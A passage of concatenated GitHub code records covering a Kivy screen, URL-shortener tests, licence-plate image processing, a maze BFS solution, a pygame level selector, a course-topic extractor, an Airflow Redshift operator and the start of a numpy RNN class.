%y\")\n )\n self.create_cards()\n","repo_name":"5KRC1/eAmenu","sub_path":"libs/screens/main_screen/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2906061622","text":"import pylons\npylons.c = pylons.tmpl_context\nfrom pylons import c\nfrom allura.tests import decorators as td\nfrom alluratest.controller import TestController\n\nfrom forgeshorturl.model import ShortUrl\n\n\nclass TestRootController(TestController):\n def setUp(self):\n super(TestRootController, self).setUp()\n self.setup_with_tools()\n\n @td.with_url\n def setup_with_tools(self):\n pass\n\n def test_shorturl_add(self):\n response = self.app.get('/admin/url/add')\n response.form['short_url'] = 'test'\n response.form['full_url'] = 'http://www.google.com/'\n response.form.submit()\n redirected = self.app.get('/url/test').follow()\n assert redirected.request.url == 'http://www.google.com/'\n\n def test_shorturl_update(self):\n response = self.app.get('/admin/url/add')\n response.form['short_url'] = 'g'\n response.form['full_url'] = 'http://www.google.com/'\n response.form.submit()\n redirected = self.app.get('/url/g').follow()\n assert redirected.request.url == 'http://www.google.com/'\n\n response = self.app.get('/url/')\n form = response.forms['update-short-url-form']\n form['short_url'] = 'g'\n form['full_url'] = 'http://www.yahoo.com/'\n form.action = '/admin/url/add/'\n form.submit()\n redirected = self.app.get('/url/g').follow()\n assert redirected.request.url == 'http://www.yahoo.com/'\n\n def test_shorturl_not_found(self):\n self.app.post('/admin/url/add',\n dict(short_url='test',\n full_url='http://www.google.com/',\n description=\"description2\"))\n r = self.app.get('/url/test2', status=404)\n r = self.app.get('/url/')\n assert 'http://www.google.com/' in r\n\n def test_shorturl_private(self):\n self.app.post('/admin/url/add',\n dict(short_url='test_private',\n full_url='http://www.amazone.com/',\n private='on',\n description=\"description1\"))\n r = self.app.get('/url/')\n assert 'http://www.amazone.com/' in r\n assert 'yes' in r\n self.app.get('/url/test_private',\n extra_environ=dict(username='*anonymous'),\n status=404)\n self.app.get('/url/test_private',\n status=302)\n\n def test_shorturl_errors(self):\n d = dict(short_url='amazone',\n full_url='amazone')\n r = self.app.post('/admin/url/add', params=d)\n assert 'error' in self.webflash(r)\n d = dict(short_url='test', full_url='http://google.com/')\n r = self.app.post('/admin/url/add', params=d)\n d['full_url'] = 'http://yahoo.com'\n r = self.app.post('/admin/url/add', params=d)\n assert 'exists' in self.webflash(r)\n\n def test_shorturl_remove(self):\n self.app.post('/admin/url/add',\n params=dict(short_url='g', full_url='http://google.com/'))\n assert ShortUrl.query.find(app_config_id=c.app.config._id).count() == 1\n self.app.post('/admin/url/remove', params=dict(shorturl='g'))\n assert ShortUrl.query.find(app_config_id=c.app.config._id).count() == 0\n\n def test_shorturl_permissions(self):\n self.app.post('/admin/url/add',\n params=dict(short_url='g', full_url='http://google.com/'),\n extra_environ=dict(username='test-user'), status=403)\n self.app.post('/admin/url/remove', params=dict(shorturl='g'),\n extra_environ=dict(username='test-user'), 
status=403)\n","repo_name":"Bitergia/allura","sub_path":"ForgeShortUrl/forgeshorturl/tests/functional/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"11119799083","text":"import cv2\nimport numpy as np\nimport scipy.fftpack\n\ndef percentage_pixel(img):\n\twhite = np.sum(img == 255)\n\tblack = np.sum(img == 0)\n\treturn (white/(white + black)) * 100\n\t\n# Color identification of the number plate using K means clustering\ndef get_color(img):\n\thsv = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n\n\tmaskyellow = cv2.inRange(hsv, np.array([20,100,100],dtype = np.uint8), np.array([30,255,255], dtype = np.uint8))\n\tperyellow = percentage_pixel(maskyellow)\n\n\tmaskwhite = cv2.inRange(hsv, np.array([0,0,168],dtype = np.uint8), np.array([172,111,255], dtype = np.uint8))\n\tperwhite = percentage_pixel(maskwhite)\n\n\tnumberplate = {peryellow:'COMMERICIAL',perwhite:'PRIVATE'}\n\n\tif max(perwhite,peryellow) < 30:\n\t\treturn 'OTHER'\n\telse:\n\t\treturn sorted(numberplate.items(), key = lambda x: x[0], reverse = True)[0][1]\n\ndef rotate(olist, rot):\n\tolistnew = []\n\tfor element in olist:\n\t\tx,y,c = element[0], element[1], element[2]\n\t\ttemplist = np.array([[element[0]], [element[1]]])\n\t\ttemplist = np.matmul(rot, templist)\n\t\tx = templist[0][0]\n\t\ty = templist[1][0]\n\t\tolistnew = olistnew + [(x,y,c)]\n\treturn olistnew\n\ndef findstring(elements, threshold):\n\telements.sort(key = lambda x: x[1])\n\tupper = ''\n\tlower = ''\n\tsd = 0\n\tif abs(elements[0][1] - elements[-1][1]) < threshold:\n\t\tprint('Single Line Case')\n\t\tsd = 0\n\telse:\n\t\tprint('Double Line Case')\n\t\tsd = 1\n\tif sd == 0:\n\t\telements.sort(key = lambda x: x[0])\n\t\tfor element in elements:\n\t\t\tupper = upper + element[2]\n\t\treturn upper\n\telse:\n\t\tav = (elements[0][1] + elements[-1][1])/2\n\t\telements.sort(key = lambda x: x[0])\n\t\t\n\t\t#print(av)\n\t\t#print(elements)\n\t\tfor element in elements:\n\t\t\t#print(element[1])\n\t\t\tif element[1] < av:\n\t\t\t\tupper = upper + element[2]\n\t\t\telse:\n\t\t\t\tlower = lower + element[2]\n\t\treturn upper + lower\n\ndef plate_to_string(x_c, y_c, line, line_thresh):\n\tolist = list(zip(x_c, y_c, line))\n\tolist.sort(key = lambda x:x[0])\n\tif len(olist) > 1:\n\t\tif olist[0][1] < olist[1][1]:\n\t\t\tx_1 = olist[1][0]\n\t\t\ty_1 = olist[1][1]\n\t\telse:\n\t\t\tx_1 = olist[0][0]\n\t\t\ty_1 = olist[0][1]\n\t\tif olist[-1][1] < olist[-2][1]:\n\t\t\tx_2 = olist[-2][0]\n\t\t\ty_2 = olist[-2][1]\n\t\telse:\n\t\t\tx_2 = olist[-1][0]\n\t\t\ty_2 = olist[-1][1]\n\t\tif x_2 - x_1 != 0:\t\n\t\t\ttheta = np.arctan((y_1 - y_2)/(x_2 - x_1))\n\t\t\trot = np.array([[np.cos(theta), -np.sin(theta)],[np.sin(theta), np.cos(theta)]])\n\t\t\tolistnew = rotate(olist, rot)\n\t\t\tolistnew.sort(key = lambda x: x[0])\n\t\t\tplate = findstring(olistnew, threshold = line_thresh)\n\t\t\tprint('Plate = ',plate)\n\t\t\treturn plate\n\t\telse:\n\t\t\treturn \" \"\n\telse:\n\t\treturn \" \"\n\ndef padder(h,w,im):\n\tblack = np.zeros((h,w,3),dtype=np.uint8)\n\tim_h,im_w = im.shape[0] , im.shape[1]\n\tblack[:im_h,:im_w,:] = im\n\treturn black\n\ndef imclearborder(imgBW, radius):\n\n # Given a black and white image, first find all of its contours\n imgBWcopy = imgBW.copy()\n if (int(cv2.__version__[0]) < 4):\n im,contours,hierarchy = cv2.findContours(imgBWcopy.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n else:\n contours,hierarchy = 
cv2.findContours(imgBWcopy.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE) \n \n\n # Get dimensions of image\n imgRows = imgBW.shape[0]\n imgCols = imgBW.shape[1] \n\n contourList = [] # ID list of contours that touch the border\n\n # For each contour...\n for idx in np.arange(len(contours)):\n # Get the i'th contour\n cnt = contours[idx]\n\n # Look at each point in the contour\n for pt in cnt:\n rowCnt = pt[0][1]\n colCnt = pt[0][0]\n\n # If this is within the radius of the border\n # this contour goes bye bye!\n check1 = (rowCnt >= 0 and rowCnt < radius) or (rowCnt >= imgRows-1-radius and rowCnt < imgRows)\n check2 = (colCnt >= 0 and colCnt < radius) or (colCnt >= imgCols-1-radius and colCnt < imgCols)\n\n if check1 or check2:\n contourList.append(idx)\n break\n\n for idx in contourList:\n cv2.drawContours(imgBWcopy, contours, idx, (0,0,0), -1)\n\n return imgBWcopy\n\n\ndef bwareaopen(imgBW, areaPixels):\n # Given a black and white image, first find all of its contours\n imgBWcopy = imgBW.copy()\n\n if (int(cv2.__version__[0]) < 4):\t\n im,contours,hierarchy = cv2.findContours(imgBWcopy.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n else:\n contours,hierarchy = cv2.findContours(imgBWcopy.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n \n\n # For each contour, determine its total occupying area\n for idx in np.arange(len(contours)):\n area = cv2.contourArea(contours[idx])\n if (area >= 0 and area <= areaPixels):\n cv2.drawContours(imgBWcopy, contours, idx, (0,0,0), -1)\n\n return imgBWcopy\n\n\n\ndef find_boxes(thresh, drawplates, maxareathresh, minareathresh):\n\ttotal, labels, boxes, centroids = cv2.connectedComponentsWithStats(thresh, 8, cv2.CV_32S)\n\tif total > 1:\n\t\tif drawplates:\n\t\t\tthresh = cv2.cvtColor(thresh, cv2.COLOR_GRAY2BGR)\n\t\tcc = []\n\t\tcentroid = []\n\t\ti = 0\n\t\twhile(i < total):\n\t\t\tx1 = int(boxes[i][0])\n\t\t\ty1 = int(boxes[i][1])\n\t\t\tx2 = x1 + int(boxes[i][2])\n\t\t\ty2 = y1 + int(boxes[i][3])\n\t\t\tif boxes[i][4] < maxareathresh and minareathresh < boxes[i][4]:\n\t\t\t\t#cc = np.append(cc, np.array([[x1,y1,x2,y2]]), axis = 0)\n\t\t\t\tcc = cc + [thresh[y1:y2,x1:x2]]\n\t\t\t\tcentroid = centroid + [(x1 + x2)/2]\n\t\t\t\tif drawplates:\n\t\t\t\t\tcv2.rectangle(thresh, (x1, y1), (x2, y2), (0,0,255), 1)\t\n\t\t\ti = i + 1\n\t\tidx = np.argsort(centroid)\n\t\tcc = np.array(cc)[idx]\n\t\t#centroid = np.array(centroid)[idx]\n\t\treturn thresh, cc\n\telse:\n\t\treturn thresh, np.empty((0,4))\n\ndef find_coordinates(img, boxes):\n width = img.shape[1]\n height = img.shape[0]\n \n for i in range(len(boxes)):\n box = boxes[i]\n x1 = abs(int((box[0] - box[2] / 2.0) * width))\n y1 = abs(int((box[1] - box[3] / 2.0) * height))\n x2 = int((box[0] + box[2] / 2.0) * width)\n y2 = int((box[1] + box[3] / 2.0) * height)\n return x1, y1, x2, y2\n\n\ndef order_points(pts):\n\n\trect = np.zeros((4, 2), dtype = \"float32\")\n\n\ts = pts.sum(axis = 1)\n\trect[0] = pts[np.argmin(s)]\n\trect[2] = pts[np.argmax(s)]\n \n\n\tdiff = np.diff(pts, axis = 1)\n\trect[1] = pts[np.argmin(diff)]\n\trect[3] = pts[np.argmax(diff)]\n \n\t# return the ordered coordinates\n\treturn rect\n\n\ndef four_point_transform(image, pts):\n\n\trect = order_points(pts)\n\t(tl, tr, br, bl) = rect\n\n\twidthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n\twidthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n\tmaxWidth = max(int(widthA), int(widthB))\n \n\n\theightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n\theightB = np.sqrt(((tl[0] - bl[0]) ** 2) + 
((tl[1] - bl[1]) ** 2))\n\tmaxHeight = max(int(heightA), int(heightB))\n\n\tdst = np.array([\n\t\t[0, 0],\n\t\t[maxWidth - 1, 0],\n\t\t[maxWidth - 1, maxHeight - 1],\n\t\t[0, maxHeight - 1]], dtype = \"float32\")\n \n\t# compute the perspective transform matrix and then apply it\n\tM = cv2.getPerspectiveTransform(rect, dst)\n\twarped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))\n \n\t# return the warped image\n\treturn warped\n\n\n\ndef plate_detect(frame, boxes, drawplates, maxareathresh, minareathresh):\n\trf = 1\n\t#kernel = np.ones((5,5),np.uint8)\n\tkernel = np.array([[1,2,1],[2,4,2],[1,2,1]], dtype = np.uint8)/16\n\n\tx1, y1, x2, y2 = find_coordinates(frame, boxes)\n\tif x1 == 0 and x2 == 0 and y1 == 0 and y2 == 0:\n\t\tx2, y2 = 1, 1\n\t\n\timg = frame[y1:y2,x1:x2]\n\talphanumerics = []\n\tIclear = np.zeros((10,10))\n\tIopen = np.zeros((10,10))\n\timggray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\t#clahe = cv2.createCLAHE(clipLimit = 2.0, tileGridSize = (8,8))\n\tsh = imggray.shape\n\n\t#original = cv2.resize(original,(sh[1],sh[0]))\n\t#Image enhancement using morphological transformation\n\tret,thresh = cv2.threshold(imggray,60,255,0)\n\tthresh = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel)\n\n\t#Contour detection for detecting the number plate area\n\tif (int(cv2.__version__[0]) < 4):\n\t\tx, contours, hierarchy = cv2.findContours(thresh, 1, 2)\n\telse:\n\t\tcontours, hierarchy = cv2.findContours(thresh, 1, 2)\n\t\t\n\tif len(contours) >0:\n\n\t\tc = max(contours, key=cv2.contourArea)\n\t\textLeft = tuple(c[c[:, :, 0].argmin()][0])\n\t\textRight = tuple(c[c[:, :, 0].argmax()][0])\n\t\textTop = tuple(c[c[:, :, 1].argmin()][0])\n\t\textBot = tuple(c[c[:, :, 1].argmax()][0])\n\t\trect = cv2.minAreaRect(c)\n\t\tpts11 = cv2.boxPoints(rect)\n\t\tbox = np.int0(pts11)*rf\n\t\tp1,p2,p3,p4 = box\n\n\t\tpts = np.array([p1, p2, p3, p4], dtype = \"float32\")\n\n\n\t\tplate = four_point_transform(img,pts)\n\t\t\n\t\timgg = cv2.cvtColor(plate, cv2.COLOR_BGR2GRAY)\n\t\t\n\t\trows = imgg.shape[0]\n\t\tcols = imgg.shape[1]\n\t\t\n\t\timgLog = np.log1p(np.array(imgg, dtype=\"float\") / 255)\n\n\t\t# Create Gaussian mask of sigma = 10\n\t\tM = 2*rows + 1\n\t\tN = 2*cols + 1\n\t\tsigma = 5\n\t\t(X,Y) = np.meshgrid(np.linspace(0,N-1,N), np.linspace(0,M-1,M))\n\t\tcenterX = np.ceil(N/2)\n\t\tcenterY = np.ceil(M/2)\n\t\tgaussianNumerator = (X - centerX)**2 + (Y - centerY)**2\n\n\t\t# Low pass and high pass filters\n\t\tHlow = np.exp(-gaussianNumerator / (2*sigma*sigma))\n\t\tHhigh = 1 - Hlow\n\n\t\t# Move origin of filters so that it's at the top left corner to\n\t\t# match with the input image\n\t\tHlowShift = scipy.fftpack.ifftshift(Hlow.copy())\n\t\tHhighShift = scipy.fftpack.ifftshift(Hhigh.copy())\n\n\t\t# Filter the image and crop\n\t\tIf = scipy.fftpack.fft2(imgLog.copy(), (M,N))\n\t\tIoutlow = scipy.real(scipy.fftpack.ifft2(If.copy() * HlowShift, (M,N)))\n\t\tIouthigh = scipy.real(scipy.fftpack.ifft2(If.copy() * HhighShift, (M,N)))\n\n\t\t# Set scaling factors and add\n\n\t\tgamma1 = 0.3 #0.3\n\t\tgamma2 = 1.5 #1.5\n\t\tIout = gamma1*Ioutlow[0:rows,0:cols] + gamma2*Iouthigh[0:rows,0:cols]\n\n\t\t# Anti-log then rescale to [0,1]\n\t\tIhmf = np.expm1(Iout)\n\t\tIhmf = (Ihmf - np.min(Ihmf)) / (np.max(Ihmf) - np.min(Ihmf))\n\t\tIhmf2 = np.array(255*Ihmf, dtype=\"uint8\")\n\n\t\t# Threshold the image - Anything below intensity 65 gets set to white\n\t\tIthresh = Ihmf2 < 80\n\t\tIthresh = 255*Ithresh.astype(\"uint8\")\n\n\t\t# Clear off the border. 
Choose a border radius of 5 pixels\n\t\tIclear = imclearborder(Ithresh, 5) #5\n\t\t#cv2.imshow('Cleaned Plate',Iclear)\n\t\t#Iclear = Ithresh\n\t\t# Eliminate regions that have areas below 40 pixels\n\n\t\tthresh = bwareaopen(Iclear, 40) #60\n\t\t\n\t\t#ret, thresh = cv2.threshold(imgg, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n\t\t#thresh = cv2.medianBlur(thresh, 3)\n\t\t#thresh = cv2.bilateralFilter(thresh, 15, 75, 75)\n\t\t\n\t\tthresh, digitbox = find_boxes(thresh, drawplates, maxareathresh, minareathresh)\n\t\t\n\n\treturn thresh, digitbox\n\t\n#cap = cv2.VideoCapture('/home/arihant/Downloads/1.mp4')\n\n#locfile = open('/home/arihant/sih_number_plate-master1/locations.txt','r')\n\n#coor = locfile.readline()\n\n","repo_name":"conspicio-ai/alpr","sub_path":"pytorch-YOLOv4/tool/plateprocessing.py","file_name":"plateprocessing.py","file_ext":"py","file_size_in_byte":10555,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"42814315262","text":"# -*- coding: utf-8 -*-\n\"\"\"미로 탐색\n\nN×M크기의 배열로 표현되는 미로가 있다.\n\n1\t0\t1\t1\t1\t1\n1\t0\t1\t0\t1\t0\n1\t0\t1\t0\t1\t1\n1\t1\t1\t0\t1\t1\n미로에서 1은 이동할 수 있는 칸을 나타내고, 0은 이동할 수 없는 칸을 나타낸다. 이러한 미로가 주어졌을 때,\n(1, 1)에서 출발하여 (N, M)의 위치로 이동할 때 지나야 하는 최소의 칸 수를 구하는 프로그램을 작성하시오.\n한 칸에서 다른 칸으로 이동할 때, 서로 인접한 칸으로만 이동할 수 있다.\n\n위의 예에서는 15칸을 지나야 (N, M)의 위치로 이동할 수 있다. 칸을 셀 때에는 시작 위치와 도착 위치도 포함한다.\n\n첫째 줄에 두 정수 N, M(2 ≤ N, M ≤ 100)이 주어진다.\n다음 N개의 줄에는 M개의 정수로 미로가 주어진다. 각각의 수들은 붙어서 입력으로 주어진다.\n\n첫째 줄에 지나야 하는 최소의 칸 수를 출력한다. 항상 도착위치로 이동할 수 있는 경우만 입력으로 주어진다.\n\"\"\"\nfrom collections import deque\n\ndx = (1, 0, -1, 0)\ndy = (0, -1, 0, 1)\n\nn, m = map(int, input().split())\n\nboard = [input() for _ in range(n)]\n\n\ndef is_valid_coord(y, x):\n return 0 <= y < n and 0 <= x < m\n\n\ndef bfs(sy, sx):\n check = [[0] * m for _ in range(n)]\n check[sy][sx] = 1\n q = deque()\n q.append((sy, sx))\n\n while q:\n y, x = q.popleft()\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n\n if is_valid_coord(ny, nx) and board[ny][nx] == '1' and check[ny][nx] == 0:\n check[ny][nx] = check[y][x] + 1\n q.append((ny, nx))\n return check\n\n\nprint(bfs(0, 0)[n - 1][m - 1])\n","repo_name":"hodoodang/legendary-guacamole","sub_path":"BOJ/2178.py","file_name":"2178.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69832601709","text":"from game.scenes.scene import Scene\n\nfrom game.objects.enemys.koishi_komeiji import KoishiKomeiji\nfrom game.objects.enemys.yukari_yakumo import YukariYakumo\n\nimport pygame\nchapthers = [\n {\n \"name\" : \"The Lost sin in the dark wood\",\n \"enemys\": [KoishiKomeiji],\n \"background\": \"dark-wood\",\n \"music\": \"game-1\",\n \"hp\": 5,\n \"time\": 60,\n \"max_hp\": 5\n },{\n \"name\" : \"The Battle At Temple\",\n \"enemys\": [YukariYakumo],\n \"background\": \"temple\",\n \"music\": \"yukari\",\n \"hp\": 5,\n \"time\": 90,\n \"max_hp\": 5\n },{\n \"name\" : \"The Battle At Temple(Day)\",\n \"enemys\": [YukariYakumo,KoishiKomeiji],\n \"background\": \"temple_day\",\n \"music\": \"yukari\",\n \"hp\": 5,\n \"time\": 120,\n \"max_hp\": 5\n },{\n \"name\" : \"The Full Moon Night\",\n \"enemys\": [KoishiKomeiji,YukariYakumo],\n \"background\": \"red-moon\",\n \"music\": \"yukari\",\n \"hp\": 5,\n \"time\": 120,\n \"max_hp\": 5\n }\n]\n\nclass ChaptherSelectorScene(Scene):\n def __init__(self, engine):\n super().__init__(engine)\n self.tick = 0\n self.current_chapther = 0\n 
self.current_music = None\n def init(self):\n self.engine.music.play('intro')\n\n for i,chapther in enumerate(chapthers):\n scale_factor = 30\n sprite = self.engine.sprites[chapther[\"background\"]]\n small_image = pygame.transform.smoothscale(sprite[\"image\"], (sprite[\"rect\"].width // scale_factor, sprite[\"rect\"].height // scale_factor))\n chapther[\"background-blurred\"] = pygame.transform.smoothscale(small_image, (self.engine.WIDTH, self.engine.HEIGHT))\n chapther[\"background-resized\"] = pygame.transform.scale(sprite[\"image\"], (self.engine.WIDTH * 0.4, self.engine.HEIGHT * 0.6))\n \n chapther[\"offset_x_target\"] = 0\n if i < self.current_chapther:\n chapther[\"offset_x_target\"] = -self.engine.WIDTH\n elif i > self.current_chapther:\n chapther[\"offset_x_target\"] = self.engine.WIDTH + self.engine.HALF_WIDTH\n chapther[\"offset_x\"] = chapther[\"offset_x_target\"]\n \n return;\n def draw_chapther(self, screen, chapther):\n offset_x = chapther[\"offset_x\"]\n detail = f\"\"\"Level Detail\nenemys: {len(chapther[\"enemys\"])}\nhp: {chapther[\"hp\"]}\nmax_hp: {chapther[\"max_hp\"]}\n\"\"\"\n screen.blit(chapther[\"background-resized\"], ((self.engine.WIDTH*0.1)+ offset_x,self.engine.HEIGHT*0.2))\n screen.draw.text(chapther[\"name\"], topleft=((self.engine.WIDTH*0.53)+ offset_x, self.engine.HEIGHT*0.2), fontsize=48, color=\"white\", owidth=2, ocolor=(39,18,77))\n screen.draw.text(\"Max Time:\", bottomleft=((self.engine.WIDTH*0.52)+ offset_x, self.engine.HEIGHT*0.56), fontsize=72, color=\"white\", owidth=2, ocolor=(39,18,77))\n screen.draw.text(str(chapther[\"time\"]) + \" Seconds\", bottomleft=((self.engine.WIDTH*0.52)+ offset_x, self.engine.HEIGHT*0.65), fontsize=82, color=\"white\", owidth=2, ocolor=(39,18,77))\n screen.draw.text(\"Higest Score:\", bottomleft=((self.engine.WIDTH*0.52)+ offset_x, self.engine.HEIGHT*0.73), fontsize=72, color=\"white\", owidth=2, ocolor=(39,18,77))\n screen.draw.text((str(chapther[\"higest_score\"] if \"higest_score\" in chapther else 0)).zfill(12), bottomleft=((self.engine.WIDTH*0.52)+ offset_x, self.engine.HEIGHT*0.82), fontsize=82, color=\"white\", owidth=2, ocolor=(39,18,77))\n screen.draw.text(detail, topleft=((self.engine.WIDTH*0.53)+ offset_x, self.engine.HEIGHT*0.25), fontsize=32, color=\"white\", owidth=2, ocolor=(39,18,77))\n def draw(self, screen):\n screen.blit(chapthers[self.current_chapther][\"background-blurred\"], (0,0))\n self.draw_chapther(screen,chapthers[self.current_chapther])\n if self.current_chapther > 0: self.draw_chapther(screen,chapthers[self.current_chapther-1])\n if self.current_chapther < len(chapthers) - 1: self.draw_chapther(screen,chapthers[self.current_chapther+1])\n screen.draw.text(\"LEVEL SELECTOR\", center=(self.engine.HALF_WIDTH, self.engine.HEIGHT * 0.1), fontsize=62, color=\"white\", owidth=2, ocolor=(39,18,77))\n screen.blit('arrow_left', (0,self.engine.HALF_HEIGHT - 36))\n screen.blit('arrow_right', (self.engine.WIDTH * 0.95,self.engine.HALF_HEIGHT - 36))\n if self.tick // 24 % 2 == 0:\n screen.draw.text(\"Press Enter to start the game!\", center=(self.engine.HALF_WIDTH, self.engine.HEIGHT*0.9), fontsize=32, color=\"white\", owidth=2, ocolor=(39,18,77))\n return;\n def update(self,pygame):\n self.tick += 1\n if self.engine.controller.keyboard_pressed[pygame.K_RETURN]:\n self.engine.sounds.pause.play()\n # self.engine.change_scene(\"CHAPTHER_SELECTER\", background=\"dark-wood\", enemys=[])\n if not self.current_music == chapthers[self.current_chapther][\"music\"]:\n self.current_music = 
chapthers[self.current_chapther][\"music\"]\n self.engine.music.play(self.current_music)\n for chapther in chapthers:\n chapther[\"offset_x\"] += (chapther[\"offset_x_target\"] - chapther[\"offset_x\"]) / 16\n return;\n def on_key_down(self, key, mod, unicode, pygame):\n if key == pygame.K_a or key == pygame.K_LEFT:\n self.current_chapther -= 1\n if key == pygame.K_d or key == pygame.K_RIGHT:\n self.current_chapther += 1\n if key == pygame.K_RETURN or key == pygame.K_e:\n chapther = chapthers[self.current_chapther]\n self.engine.change_scene(\"GAME\", background=chapther[\"background\"], enemys=chapther[\"enemys\"], music=chapther[\"music\"])\n self.engine.sounds.pause.play()\n if key == pygame.K_ESCAPE:\n self.engine.change_scene(\"INTRO\")\n self.current_chapther = min(max(self.current_chapther,0),len(chapthers)-1)\n chapthers[self.current_chapther][\"offset_x_target\"] = 0\n for i,chapther in enumerate(chapthers):\n if i < self.current_chapther:\n chapther[\"offset_x_target\"] = -self.engine.WIDTH\n elif i > self.current_chapther:\n chapther[\"offset_x_target\"] = self.engine.WIDTH + self.engine.HALF_WIDTH\n","repo_name":"chanios/project-pygame","sub_path":"game/scenes/chapther_selecter.py","file_name":"chapther_selecter.py","file_ext":"py","file_size_in_byte":6270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33747995759","text":"'''\nTopic class to simulate course topic\nAuthor : Mayuri Wadkar\n'''\n\nfrom Utils import technologies_stopwords, fetch_description_techs\nfrom SummarizationModule import *\nfrom bs4 import BeautifulSoup as Soup\nimport urllib\n\nclass Topic:\n\n def __init__(self):\n self.cluster = None\n self.topic = None\n self.technologies = None\n self.listedTech = None\n self.actionList = None\n self.summary = None\n\n '''\n Function to initiate extraction of course topic, technologies, action lists and summary\n '''\n def set_syllabus_content(self):\n\n job_closest_to_centroid = self.cluster.closest_job_document\n description_of_job_closest_to_centroid, techSet_of_job_closest_to_centroid = fetch_description_techs(job_closest_to_centroid.jobLink)\n title_of_job_closest_to_centroid = job_closest_to_centroid.jobTitle\n\n #integration with NLP\n job_descriptions = \"\"\n # job_titles = \"\"\n technologies = set()\n\n for job in self.cluster.cluster:\n url = job.jobLink\n # print job.jobLink\n joblinkTarget = Soup(urllib.urlopen(url), \"html.parser\")\n techTags = joblinkTarget.findAll('a', attrs={'class': 'post-tag job-link no-tag-menu'})\n for tag in range(len(techTags)):\n tech = str(techTags[tag].get_text())\n if tech not in technologies_stopwords:\n technologies.add(tech)\n\n job_description = joblinkTarget.find('div', attrs={'class': 'description'})\n if job_description != None:\n job_description = job_description.get_text()\n else:\n job_description = joblinkTarget.find('span', attrs={'class': 'summary'})\n if job_description != None:\n job_description = job_description.get_text()\n else:\n job_description = joblinkTarget.find('div', attrs={'itemprop': 'description'})\n if job_description != None:\n job_description = job_description.get_text()\n if job_description != None:\n job_descriptions += job_description\n # job_titles += job.jobTitle\n\n summarizer = SummarizationModule()\n\n self.summary = summarizer.summarize_job_descriptions(job_descriptions)\n self.listedTech, self.actionList = summarizer.get_listed_tech_and_action_list(job_descriptions)\n self.technologies = technologies\n self.topic = 
summarizer.get_topic(title_of_job_closest_to_centroid)","repo_name":"Mayuri-Wad-012447851/Course-Recommendation-Project","sub_path":"Topic.py","file_name":"Topic.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33531897299","text":"from airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\nfrom helpers import SqlQueries\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\nclass PreProcessAndLoadOperator(BaseOperator):\n\n ui_color = '#F98866'\n\n @apply_defaults\n def __init__(self,\n redshift_table_name,\n redshift_conn_id='redshift',\n month_name = 'October',\n truncate=True,\n *args, **kwargs):\n\n super(PreProcessAndLoadOperator, self).__init__(*args, **kwargs)\n self.table_name=redshift_table_name\n self.redshift_conn_id = redshift_conn_id\n self.truncate = truncate\n self.month_name = month_name\n\n def execute(self, context):\n redshift = PostgresHook(postgres_conn_id=self.redshift_conn_id)\n \n df = redshift.get_pandas_df(SqlQueries.select_from_table.format(table_name=self.table_name))\n\n df = df.sort_values(['country', 'date'])\n df['confirmed'] = df.groupby(['country'])['confirmed'].diff().fillna(0)\n df['recovered'] = df.groupby(['country'])['recovered'].diff().fillna(0)\n df['deaths'] = df.groupby(['country'])['deaths'].diff().fillna(0)\n df['date'] = pd.to_datetime(df['date'])\n df = df[df['date'].dt.month_name()== self.month_name]\n\n if self.truncate:\n redshift.run(SqlQueries.truncate_table.format(table_name=\"covid_cases\"))\n\n rows = list(df.itertuples(index=False, name=None))\n redshift.insert_rows(table=\"covid_cases\", rows=rows, commit_every=0)\n \n","repo_name":"MBtech/data-eng-capstone","sub_path":"airflow/plugins/operators/preprocess_and_load.py","file_name":"preprocess_and_load.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11271437231","text":"\r\nimport numpy as np\r\nimport sys\r\nimport matplotlib.pyplot as plt\r\nfrom keras.utils import to_categorical\r\n\r\nclass RNN_func:\r\n\t\r\n\tdef __init__(self, word_dim, hidden_dim=4, bptt_truncate=0):\r\n # Initialize the basic parameters (vocabulary size, hidden layer size)\r\n\t\tself.word_dim = word_dim\r\n\t\tself.hidden_dim = hidden_dim\r\n\t\tself.bptt_truncate = bptt_truncate\r\n # Randomly initialize the network parameters\r\n\t\tself.U = np.random.uniform(-np.sqrt(1./word_dim), np.sqrt(1./word_dim), (hidden_dim, word_dim))\r\n\t\tself.V = np.random.uniform(-np.sqrt(1./hidden_dim), np.sqrt(1./hidden_dim), (word_dim, hidden_dim))\r\n\t\tself.W = np.random.uniform(-np.sqrt(1./hidden_dim), np.sqrt(1./hidden_dim), (hidden_dim, hidden_dim))\r\n\r\n\tdef forward_propagation(self, x):\r\n # Total number of time steps\r\n\t\tT = len(x)\t\t\r\n\t\t# Store the output values o and the hidden states s for later use\r\n\t\ts = np.zeros((T, 